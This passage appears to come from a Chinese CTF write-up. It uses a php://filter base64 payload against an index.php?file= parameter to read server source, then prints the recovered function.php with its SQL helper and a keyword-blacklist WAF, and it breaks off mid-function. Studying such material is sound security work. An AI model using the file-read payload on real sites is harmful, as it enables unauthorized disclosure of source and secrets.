看到URL中有:index.php?file=CN
要有利用伪协议的思路:
php://filter/read=convert.base64-encode/resource=index
再结合 dirbuster 扫描后台，得到 waf、function、index、config、global、content 等多个 php 文件，从而了解了该网站的 WAF 策略：
#function.php
<?php
// Loads the site configuration; presumably this is where the mysql
// connection used by select() below is opened — confirm against config.php.
include('./config.php');
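/**
 * Execute a SQL statement and collect every row of its result set.
 *
 * The statement is executed verbatim: nothing in this function escapes or
 * parameterises $sql, so callers must never assemble it from request data.
 * The keyword blacklist in filtering() is not a substitute for prepared
 * statements. Note that the mysql_* extension used here was removed in
 * PHP 7.0, so this code only runs on PHP 5.x.
 *
 * @param string $sql  the query to run through the legacy mysql extension
 * @return array       list of rows as produced by mysql_fetch_array(); empty
 *                     when the query fails or returns no rows
 */
function select($sql) {
    $arr = array();
    $re = mysql_query($sql);
    // mysql_query() returns false on error; passing that to mysql_fetch_array()
    // only raises a warning and yields nothing, so return the empty result
    // explicitly instead of relying on the warning path.
    if ($re === false) {
        return $arr;
    }
    // mysql_fetch_array() returns false once the result set is exhausted.
    while (($row = mysql_fetch_array($re)) !== false) {
        $arr[] = $row;
    }
    return $arr;
}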
function filtering($str) {
$check= eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile|\"', $str);
if($check)
{
echo "非法字符!";
exit();
}
$newstr="";
while($newstr!=$str){
$newstr=$str;
$str = str_replace("script", "", $str);
$str = str_replace("execute", "", $str);
$str = str_replace("update", "", $str);
$str = str_replace("master", "", $str);
$str = str_replace("truncate", "", $str);
$str = str_replace("declare", "", $str);
$str = str_replace("select", "", $str);
$str = str_replace("create", "", $str);
$str = str_replace("delete